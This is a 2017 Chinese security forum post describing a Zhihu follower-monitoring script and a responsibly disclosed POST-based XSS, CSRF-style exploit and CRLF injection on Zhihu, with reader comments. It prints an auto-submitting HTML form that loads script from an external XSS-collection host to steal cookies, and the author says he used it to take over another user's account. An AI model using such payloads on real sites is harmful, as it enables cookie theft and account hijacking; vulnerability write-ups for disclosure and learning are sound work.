用户
搜索
  • TA的每日心情

    2016-6-6 19:48
  • 签到天数: 8 天

    连续签到: 2 天

    [LV.3]偶尔看看II

    版主

    Rank: 7Rank: 7Rank: 7

    61

    主题

    377

    帖子

    3052

    魔法币
    收听
    0
    粉丝
    37
    注册时间
    2016-4-17

    秦i春秋签约作者

    发表于 2017-7-17 16:17:34 185708
    本帖最后由 jing0102 于 2017-8-2 07:06 编辑

    今天突然有一个想法,就是去写一个知乎的粉丝量监控。

    现在脑里有一个基本思维模型:

    找一个接口或者直接匹配页面的粉丝量->(自定义时间)刷新一次再次获取粉丝量对比上一次->输出增减粉丝量

    接口获取分析&代码编写

    这里尝试在知乎的个人中心抓包:

    URL:https://www.zhihu.com/people/gh0stkey

    Packet:
    0.png

    没有发现有接口返回粉丝数量,这时候我点击了关注者那一块:

    URL:https://www.zhihu.com/people/gh0stkey/followers

    Packet:
    1.png

    这时候发现了一个接口:
    2.png

    图中 totals 的值 4873 就是我的粉丝数量。

    第一步代码编写思路:使用Python中的requests库获取网页代码(json),再使用Python中的json库将json解析成python字典类型,然后就跟操作字典一样取值就可以了。

    4.png

    第二步代码编写思路:使用while 1死循环进行对比
    5.png

    可以看见图中-1和1都是让Az取关和关注测试的增减。成功的完成了监控功能。

    整理历史Packet

    我这个人有一个习惯就是喜欢去看以前的东西,而且也喜欢把浏览过认为有用的东西(目前有一个想法想做一个历史资产管理平台,初步模型已经出来了:使用代理式的方式自动整理经过这代理的URL然后自动进行各个方面的整理,例如对Struts2框架的整理[初衷是为了让新漏洞一出现就可以及时方便的定位可能存在的资产点])

    发现了一个有点意思的请求包:

    6.png





    没有POST请求正文,也没有响应数据,单纯的GET请求是提示请求方式出错:
    7.png

    这里我尝试使用Hackbar的功能去模拟一个POST请求:

    8.png

    这里就提示udid不能为空,那么在模拟POST请求正文发一个udid过去呢?

    9.png

    可以看见我模拟的udid的值test输出到了页面中,相信大家第一时间想到的肯定就是HTML注入~

    10.png

    可以发现成功的注入了HTML,那么XSS能否成功呢?明显是可以的~
    11.png

    这时候如果有一枚CSRF(客户端请求伪造攻击漏洞)的话那岂不是爽歪歪?( ╯□╰ )奈何小弟无力,挖掘半天没挖到,所以我产生了一个想法让Az来点击我伪造好的链接,偷他的Cookie。因为这里是POST XSS Injection,可以使用CSRF的Exploit的构建方法,简单来说这一处其实就是一处CSRF漏洞。

    Exploit:

    [HTML] 纯文本查看 复制代码
    <form action="https://zhihu.com/**" method="post" id="form1">
    
    <input type="hidden" name="udid" value="<script/src=https://***></script>">
    
    </form>
    
    <script>
    
    document.getElementById("form1").submit();
    
    </script>


    12.png

    (因为这里知乎是https的所以准备的xss平台也要是https的,这里测试可以打到自己的Cookie)
    实战偷取Az(林晨的Cookie)并盗了他的账号:
    13.png

    对方成功点击了链接 然后收到了Cookie,伪造登陆之:
    14.png

    然后突然看到udid的内容其实是在状态消息那一块 那么是不是就存在的CRLF注入呢?
    CRLF注入是一类漏洞,在用户设法向应用插入CRLF时出现。在多种互联网协议中,包括HTML,CRLF字符表示了行的末尾,通常表示为\r\n,编码后是%0D%0A。在和HTTP请求或响应头组合时,这可以用于表示一行的结束,并且可能导致不同的漏洞,包括HTTP请求走私和HTTP响应分割。
    经过测试就发现确实存在:
    15.png

    End

    7.16 发现漏洞

    7.17 凌晨提交漏洞详情

    7.17 10:15分 知乎获取漏洞详情 并且采取了修复措施


    16.png

    评分

    参与人数 3积分 +60 魔法币 +60 收起 理由
    z7788520 + 10 感谢你的分享,i春秋论坛有你更精彩!.
    kaikaix + 10 感谢发布原创作品,i春秋论坛因你更精彩!.
    sn0w + 50 + 50 6666666666666666666666666666666666666666

    查看全部评分

    gh0stkey,米斯特安全团队核心。
    i春秋社区"通信安全"版主。
    关注米斯特安全团队:www.hi-ourlife.com
    发表于 2017-7-17 17:54:54
    onls辜釉 发表于 2017-7-17 09:49
    我看了下不是有httponly吗

    主站有 分站没啊 而且 在修复中了
    gh0stkey,米斯特安全团队核心。
    i春秋社区"通信安全"版主。
    关注米斯特安全团队:www.hi-ourlife.com
    使用道具 举报 回复
    传说的闲来无事来一发,膜拜
    使用道具 举报 回复
    onls辜釉 i春秋签约作家 春秋认证√作家团颜值担当 i春秋签约作者
    推荐
    发表于 2017-7-17 17:49:40
    我看了下不是有httponly吗
    信息安全菜鸟/社会主义接班人
    使用道具 举报 回复
    发表于 2017-7-19 11:39:06
    有技术的大牛无所不能
    使用道具 举报 回复
    我靠key哥666666666
    使用道具 举报 回复
    我靠key哥666666666
    使用道具 举报 回复
    发表于 2017-7-17 16:24:40
    卧槽 无敌啊
    不可告人的秘密:ixuehua.blog.163.com


    -
    <script>alert(/xxx/)<script>
    使用道具 举报 回复
    我靠key哥666666666
    来啊~快活啊~
    使用道具 举报 回复
    发表于 2017-7-17 16:42:24
    前排
    xss  交流群602221356  接收XSS爱好者
    使用道具 举报 回复
    发表于 2017-7-18 09:12:16
    厉害啊
    使用道具 举报 回复
    发表于 2017-7-18 10:09:25
    谢谢分享
    使用道具 举报 回复
    发表于 2017-7-18 14:41:29
    表哥6666
    使用道具 举报 回复

    表哥6666
    使用道具 举报 回复
    发表于 2017-7-31 19:48:52
    谢谢分享
    使用道具 举报 回复
    发表于 2017-7-31 22:30:41
    厉害了,这思路,叼叼叼
    使用道具 举报 回复
    大佬啊!!!
    使用道具 举报 回复
    12下一页
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册